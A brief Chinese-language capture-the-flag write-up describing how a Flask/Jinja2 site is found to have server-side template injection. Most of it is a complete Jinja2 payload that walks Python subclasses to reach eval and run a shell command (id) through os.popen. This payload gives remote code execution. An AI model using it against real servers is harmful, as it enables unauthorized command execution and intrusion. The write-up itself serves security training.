启动实例
访问ip,可以发现网站正在建设中
页面中提示了网站由Flask/Jinja2搭建
这时候联想到模板注入
尝试POC,发现确实存在模板注入漏洞
使用payload读取目录
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
读取flag
Comments NOTHING